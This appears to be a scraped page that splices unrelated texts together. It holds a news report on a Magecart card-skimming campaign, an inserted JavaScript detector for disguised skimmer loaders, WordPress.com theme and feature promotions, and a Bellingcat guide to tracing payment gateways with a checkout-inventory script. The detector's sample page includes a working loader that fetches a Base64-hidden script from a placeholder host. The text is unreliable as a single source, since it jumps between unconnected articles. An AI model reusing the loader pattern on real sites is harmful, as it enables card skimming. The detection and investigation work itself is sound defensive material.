Researchers Spot a Different Kind of Magecart Card-Skimming Campaign

An attacker under the Magecart umbrella has infected an unknown number of e-commerce sites in the US, UK, and five other countries with malware for skimming credit card numbers and personally identifiable information (PII) belonging to people making purchases on these sites. But in a new wrinkle, the threat actor is also using the same sites as hosts for delivering the card-skimming malware to other target sites.

Researchers from Akamai who spotted the ongoing campaign note that this not only makes the campaign different from prior Magecart activity, but it’s also much more dangerous.

They assess that the cyberattacks have been going on for at least one month and have potentially affected tens of thousands of people already. Akamai said that in addition to the US and UK, it has spotted websites affected by the campaign in Brazil, Spain, Estonia, Australia, and Peru.

Payment Card Theft & More: A Double Compromise

Magecart is a loose collective of cybercriminal groups involved in online payment card-skimming attacks. Over the past several years, these groups have injected their namesake card skimmers into tens of thousands of sites worldwide, including sites such as TicketMaster and British Airways, and stolen millions of credit cards from them, which they have then monetized in different ways.

Akamai counted Magecart attacks on 9,200 e-commerce sites last year, of which 2,468 remained infected as of the end of 2022.

The typical modus operandi for these groups has been to surreptitiously inject malicious code into legitimate e-commerce sites — or into third-party components such as trackers and shopping carts — that the sites use, by exploiting known vulnerabilities. When users enter credit card information and other sensitive data on the checkout page of compromised websites, the skimmers silently intercept the data and send it to a remote server. So far, attackers have primarily targeted sites running the open source Magento e-commerce platform in Magecart attacks.

The latest campaign is slightly different in that the attacker is not just injecting a Magecart card skimmer into target sites but is also hijacking many of them to distribute malicious code. 

“One of the primary advantages of utilizing legitimate website domains is the inherent trust that these domains have built over time,” according to the Akamai analysis. “Security services and domain scoring systems typically assign higher trust levels to domains with a positive track record and a history of legitimate use. As a result, malicious activities conducted under these domains have an increased chance of going undetected or being treated as benign by automated security systems.”

In addition, the attacker behind the latest operation has also been attacking sites running not just Magento but other software, such as WooCommerce, Shopify, and WordPress.

A Different Approach, Same Outcome

“One of the most notable parts of the campaign is the way the attackers set up their infrastructure to conduct the web skimming campaign,” Akamai researcher Roman Lvovsky wrote in the blog post. “Before the campaign can start in earnest, the attackers will seek vulnerable websites to act as ‘hosts’ for the malicious code that is used later on to create the web skimming attack.”

Akamai’s analysis of the campaign showed the attacker using multiple tricks to obfuscate the malicious activity. For example, instead of injecting the skimmer directly into a target website, Akamai found the attacker injecting a small JavaScript code snippet into its webpages that then fetched the malicious skimmer from a host website. 

The attacker designed the JavaScript loader to look like Google Tag Manager, Facebook Pixel tracking code, and other legitimate third-party services, so it becomes hard to spot. The operator of the ongoing Magecart-like campaign also has been using Base64 encoding to obfuscate the URLs of compromised websites hosting the skimmer. 

“The process of exfiltrating the stolen data is executed through a straightforward HTTP request, which is initiated by creating an IMG tag within the skimmer code,” Lvovsky wrote. “The stolen data is then appended to the request as query parameters, encoded as a Base64 string.”

In a more sophisticated touch, Akamai also found code in the skimmer malware that ensured it did not steal the same credit card and personal information twice.
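As an added illustration (this is not code from the article or from Akamai's report), the following Node.js script scans a page's inline scripts for the two patterns described above: a loader that decodes a Base64-hidden host URL before injecting a script, and an exfiltration beacon built from an image whose source carries btoa()-encoded data. The sample page, the host name inside it and the heuristics themselves are constructed for this example; in practice you would run something like this over crawled checkout pages and treat hits as leads for manual review, not as verdicts.

```javascript
// Added example (not from the article or Akamai): heuristics for the loader
// and exfiltration patterns described in the text. Sample page is constructed.
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// Runs of Base64 alphabet long enough to hold a URL (16+ chars, optional padding).
const B64_RE = /[A-Za-z0-9+/]{16,}={0,2}/g;

// Decode every Base64-looking run and keep the ones that turn into a URL.
function decodeBase64Urls(text) {
  const urls = [];
  for (const run of text.match(B64_RE) || []) {
    const decoded = Buffer.from(run, 'base64').toString('utf8');
    if (/^(?:https?:)?\/\/[\w.-]+/.test(decoded)) urls.push(decoded);
  }
  return urls;
}

// Scan all inline <script> bodies in a page and report the suspicious ones.
function scanInlineScripts(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const body = m[1];
    if (!body.trim()) continue; // external script tag, nothing inline to inspect
    const reasons = [];
    const hiddenUrls = decodeBase64Urls(body);
    if (hiddenUrls.length) reasons.push('base64-encoded URL: ' + hiddenUrls.join(', '));
    const injectsScript = /createElement\(\s*['"]script['"]\s*\)/.test(body);
    if (injectsScript && /\batob\s*\(/.test(body)) {
      reasons.push('dynamic script load from atob()-decoded source');
    }
    const imageBeacon = /new\s+Image\s*\(|createElement\(\s*['"]img['"]\s*\)/.test(body)
      && /\.src\s*=/.test(body) && /\bbtoa\s*\(/.test(body);
    if (imageBeacon) reasons.push('image beacon whose src carries btoa()-encoded data');
    if (reasons.length) findings.push({ snippet: body.trim().slice(0, 60), reasons });
  }
  return findings;
}

// Constructed sample page: a legitimate-looking gtag snippet for contrast, then a
// loader of the kind described above that hides its host URL in Base64.
// The host name is a placeholder, not a real compromised site.
const HIDDEN_HOST_URL = 'https://compromised-shop.example/assets/t.js';
const SAMPLE_HTML = `<html><head>
<script async src="https://www.googletagmanager.com/gtag/js?id=GTM-EXAMPLE"></script>
<script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}gtag('js',new Date());</script>
<script>(function(){var s=document.createElement('script');s.src=atob('${Buffer.from(HIDDEN_HOST_URL).toString('base64')}');document.head.appendChild(s);})();</script>
</head><body></body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanInlineScripts(SAMPLE_HTML), null, 2));
}
```

Run against the sample, the gtag snippet produces no finding while the loader is reported twice over: once for the decoded URL (so the analyst immediately sees which host is serving the second stage) and once for the atob()-fed script injection. The Base64 check is deliberately loose; long identifiers will be decoded and discarded because they do not turn into a URL.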

5 Hidden Features of WordPress.com – WordPress.com News

Isn’t it amazing how you can learn new things about someone, even after years of knowing them? That’s how Jamie Marsland has felt in the last few weeks while diving deeper into WordPress.com’s capabilities. In today’s Build and Beyond video, he shares five incredible features built right into the platform that aren’t as well known as they should be. Whether you’re a blogger, a developer, or fall somewhere between, you’re likely to discover something new and useful. 

Ready to build on WordPress.com? Start a free trial today:

New WordPress.com Themes for March 2024 – WordPress.com News

Published

on

By

New WordPress.com Themes for March 2024 – WordPress.com News

Five of our favorite new themes.

The WordPress.com team is always working on new design ideas to bring your website to life. Check out the latest themes in our library, including great options for small businesses, sports fan, nostalgic bloggers, and more.


Feelin’ Good is a vibrant (to say the least!) blog theme with a bold vaporwave aesthetic. Its nostalgic atmosphere pays homage to the daring, over-the-top visual art and advertisements of the ’80s and early ’90s. We’ve combined a lot of elements that shouldn’t work together, but do. If you’re looking for a dynamic, attention-grabbing, eye-popping visual feast of a theme, try Feelin’ Good.

Click here to view a demo of this theme.


Low Fi is a simple blog theme featuring a narrow column layout that’s optimized for seamless browsing on mobile devices. With six style variations, you’re sure to find a palette you’re drawn to. Taking inspiration from the lo-fi beats music scene, the theme’s design cues, such as the square header image, offer a nod to album artwork.

The overall aesthetic is deliberately understated, with each element—from the muted color schemes to the textured background—crafted to evoke a sense of nostalgia and warmth.

Click here to view a demo of this theme.


Cakely is the ultimate WordPress theme designed specifically for passionate bakers, cake enthusiasts, and dessert lovers. Tailored for small businesses aiming to shine in the world of sweets, Cakely effortlessly combines style and functionality to showcase mouthwatering creations. Its vibrant pink color scheme exudes joy while maintaining a classy, clean layout with easy navigation. This theme ultimately strikes the perfect balance between professionalism and playfulness, making it an ideal choice for showcasing your delicious masterpieces.

Click here to view a demo of this theme.


Treehouse is a carefree, fun, and friendly theme ideal for Woo stores selling children’s products. With its unlimited customization options, Treehouse enables you to set up an online shop with just a few clicks. Utilizing a soft color palette, playful design details, and simplified layouts, your site will attract a wide range of customers, from young parents to over-the-moon grandparents. This theme is fully responsive and cross-browser compatible.

Click here to view a demo of this theme.


Major League Baseball’s 2024 season kicks off on Thursday, March 28. What better way to show your home team the love it deserves than with a baseball-themed fan site! With a somewhat old-school layout, this theme evokes some of the classic sports sites of the ’90s, back before fantasy leagues took over. The header and accent colors are customizable, ensuring that your favorite crew is properly saluted.

Click here to view a demo of this theme.

To install any of the above themes, click the name of the theme you like, which brings you right to the installation page. Then click the “Activate this design” button. You can also click “Open live demo,” which brings up a clickable, scrollable version of the theme for you to preview.

Premium themes are available to use at no extra charge for customers on the Explorer plan or above. Partner themes are third-party products that can be purchased for $79/year each.

You can explore all of our themes by navigating to the “Themes” page, which is found under “Appearance” in the left-side menu of your WordPress.com dashboard. Or you can click below:


How to Get Started: Investigating Payment Gateways Online

When investigating a website, app, or online shop, one of the key questions you may need to answer is ‘How are they making money?’ 

Investigating the financial transactions of an organisation can reveal details about its connections and funding. Furthermore, if the website or app is engaged in illicit transactions, tracing the payment gateway can help achieve accountability by identifying which sites they are using to earn money. Bellingcat has looked into the payment processors in previous investigations on far-right merchandise, Britain's far-right influencers, and non-consensual deepfake pornography.

Credit: Nicolas Guyonnet / Hans Lucas via Reuters Connect

Payment gateways are a technology that takes a customer’s payment information, checks it with their financial institution, verifies that the transaction is legitimate, and then completes the transaction. As explained by Forbes, online stores need a payment gateway to be able to facilitate payments. Companies including PayPal, Stripe, and Square are commonly used as a payment gateway for online purchases.

Most mainstream payment gateways (like Stripe and PayPal) prohibit their services from being used in illegal transactions, including the sale of illegal drugs, the promotion of hate or racial intolerance, and non-consensual adult content. Finding evidence that someone is violating the terms of service of these companies, and how they are doing so, can lead to the closure of loopholes and accounts. It can also provide additional information about an organisation's revenue streams.

It is nearly impossible to conduct online transactions without a payment gateway. So it should be possible to find the payment gateway of an organisation earning money, even if it is not obvious at first. One resource that is extremely useful is Chrome's built-in developer tools (other browsers have similar tools). Below we provide an overview of the tools to use and the questions to ask when scrutinising payment systems.

How are they Taking Payment?

For online transactions, you’ll typically see websites accept traditional forms of payment including credit cards, debit cards and, more recently, cryptocurrency. Since cryptocurrency is not subject to the same regulations as traditional financial systems, cryptocurrency is often used to process payments for illegal services. Since this does not need to be ‘hidden’, websites will usually disclose which currency they accept and how to transfer funds into a crypto wallet. There are other ways you can track funding through cryptocurrency, as discussed in this guide.

If none of the above apply, look for a payment gateway: sites that use one accept money directly via credit card payment, bank transfer, or peer-to-peer payment apps (e.g., PayPal, Cash App, Zelle). If this is the case, you should be able to identify the payment gateway being used. Peer-to-peer apps may be used by businesses, not just for individuals' transactions, and they require a bank account or credit card to use. It is helpful to view transaction options on both the mobile app and the web browser, in case the options differ. It is also worth checking the currency that payments are being taken in: if a US website takes payment in a foreign currency, that can provide clues. Further, if a website uses different payment gateways depending on the currency, this can open up additional leads in your investigation. Payment options may also change depending on what IP address you are using; in other words, setting your IP address to the UK and then changing it to the US may result in different payment gateway options.

Where are they Soliciting for Payment?

Organisations may solicit payment via a website or a messaging app like Telegram. It is important to investigate all avenues where payment is being requested, as each method may provide different clues for your investigation. For example, for some of the AI deepfake services we investigated, we found that companies would accept different payment methods depending on how you tried to pay: via their website, via a web browser, or via Telegram. Sellers may want to direct their users away from their website to more private forums such as Telegram to facilitate transactions and avoid detection.

Is the Organisation Trying to Hide How Payment is Taken?

For some sellers, using a mainstream payment gateway may violate the terms of service of that company. To be able to use their services, these sellers may try to hide the nature of their goods from the payment gateway company.

A Walk Through Example

Some sites may not show their payment options without signing up first. 

This was the case with the Nudify.VIP site, which offers non-consensual AI deepfake pornography.

Initially, the website states that their services are free. 

“With our service you can undress any person in a photo absolutely FREE!” 

However, this is misdirection, as you are then prompted to log in or sign up. Only once you create an account do you discover that you need to pay to access the service and how much it costs.

After creating an account, we were presented with two options to pay, by card or crypto. 

You are then presented with an option to pay via crypto or via credit card, but it does not yet say what cards they accept or what payment gateway they use. 

Clicking through to 'Go To Payment' gives us a new screen that lets the user pay via credit card (e.g. MasterCard, Visa), a US bank account (e.g. Wells Fargo, USAA), or through Cash App.

There is no indication of the payment gateway they are using, but if we look at the URL on the checkout page, we can see that it no longer says we are on a Nudify.VIP domain. This is a clue that users are being directed to the checkout page through another website, a method used to hide the true source of purchases from payment gateway providers. There is another clue that the domain has changed in the fine print at the bottom of the checkout page. With either the Cash App or the credit card option selected, the checkout page discloses:

“By providing your card information, you allow aiphotos.art to charge your card for future payments in accordance with their terms.”

This is another clue that the payment gateway does not know this account belongs to the AI deepfake service Nudify.VIP.

Three checkout options for Nudify.VIP: credit card, US bank account, and Cash App.

Use Browser Developer Tools to Investigate Further

All modern browsers have some form of built-in developer tools. You can search online for your specific browser (e.g. Firefox, Chrome, Safari). If you are in Chrome, you can right-click anywhere on the screen to get a menu with an 'Inspect' option. You can also use keyboard shortcuts, which vary between macOS and Windows: on Windows, press Ctrl + Shift + I, and on macOS press Option + Command + I. Any of these actions opens the developer tools, which let you view the code of a webpage (HTML, CSS, and JavaScript). They should appear on the right-hand side of your screen. While developer tools are designed for checking a website for bugs and errors, you can use them in your investigation.

There should be a list of tabbed options for you to view on the top menu bar. Clicking on ‘Sources’ shows you all the resources that the website is using. 

This is a good place to start to look for any clues about what piece of code is being used in the checkout process.  In the example below, one of the listed sources on the page is titled ‘js.stripe.com.’
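As an added example (not part of the Bellingcat guide), here is a Node.js script that automates the manual Sources-tab check described above. Given the storefront URL, the checkout page URL and the checkout page's HTML, it lists the third-party hosts the checkout page loads resources from, matches them against a small hand-maintained table of known gateway script hosts (js.stripe.com from the guide, plus PayPal and Braintree hosts added here), flags when the checkout page sits on a different domain than the storefront, and pulls the merchant name out of a "you allow X to charge your card" disclosure like the one quoted above. The storefront, checkout host and merchant-of-record names in the sample are constructed placeholders, not real sites.

```javascript
// Added example (not from the Bellingcat guide): automate the Sources-tab check.
// Hosts, domains and page content in the sample are constructed placeholders.

// Hand-maintained table of script hosts that identify a gateway. js.stripe.com is
// the host the guide mentions; the PayPal and Braintree entries are added here.
const GATEWAY_HOSTS = {
  'js.stripe.com': 'Stripe',
  'www.paypal.com': 'PayPal',
  'www.paypalobjects.com': 'PayPal',
  'js.braintreegateway.com': 'Braintree (PayPal)',
};

// Crude "same site" test: compare the last two labels of the host name.
// Good enough for .com/.example; a public-suffix list is needed for co.uk and the like.
function siteOf(hostname) {
  return hostname.split('.').slice(-2).join('.');
}

// Collect every host that src/href/action attributes on the page point at,
// resolving relative URLs against the page URL.
function referencedHosts(html, pageUrl) {
  const attrRe = /<(script|iframe|form|img|link)\b[^>]*?\s(?:src|href|action)\s*=\s*["']([^"']+)["']/gi;
  const hosts = new Set();
  for (const m of html.matchAll(attrRe)) {
    try { hosts.add(new URL(m[2], pageUrl).hostname); } catch { /* skip malformed URLs */ }
  }
  return [...hosts];
}

function inventoryCheckout(storefrontUrl, checkoutUrl, checkoutHtml) {
  const checkout = new URL(checkoutUrl);
  const storefront = new URL(storefrontUrl);
  const thirdPartyHosts = referencedHosts(checkoutHtml, checkout)
    .filter(h => siteOf(h) !== siteOf(checkout.hostname));
  const gateways = thirdPartyHosts
    .filter(h => Object.prototype.hasOwnProperty.call(GATEWAY_HOSTS, h))
    .map(h => ({ host: h, provider: GATEWAY_HOSTS[h] }));
  // Fine-print disclosure of the kind quoted above: "you allow <name> to charge your card".
  const disclosure = checkoutHtml.match(/allow\s+([\w-]+(?:\.[\w-]+)+)\s+to\s+charge/i);
  return {
    checkoutHost: checkout.hostname,
    // A checkout page on a different site than the storefront is the clue the guide describes.
    offDomainCheckout: siteOf(checkout.hostname) !== siteOf(storefront.hostname),
    thirdPartyHosts,
    gateways,
    merchantOfRecord: disclosure ? disclosure[1] : null,
  };
}

// Constructed sample: a storefront that hands off to a checkout page on another
// domain, which loads Stripe's script and carries a merchant-of-record disclosure.
const SAMPLE_STOREFRONT_URL = 'https://shop-front.example/';
const SAMPLE_CHECKOUT_URL = 'https://pay.checkout-host.example/checkout?o=1';
const SAMPLE_CHECKOUT_HTML = `<html><head>
<link rel="stylesheet" href="/static/checkout.css">
<script src="https://js.stripe.com/v3/"></script>
</head><body>
<form action="/api/pay" method="post"><input name="card"></form>
<p>By providing your card information, you allow merchant-of-record.example to charge your card for future payments in accordance with their terms.</p>
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(inventoryCheckout(SAMPLE_STOREFRONT_URL, SAMPLE_CHECKOUT_URL, SAMPLE_CHECKOUT_HTML), null, 2));
}
```

Paste the checkout page's HTML (View Page Source in the browser) into the script, or feed it the saved page, and read the three fields the guide has you look for by hand: whether the checkout domain differs from the storefront, which gateway's script is loaded, and whose name appears in the fine print. Same-site resources (the stylesheet and the form action in the sample) are filtered out so only third-party hosts remain; extend the GATEWAY_HOSTS table as you encounter other providers.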
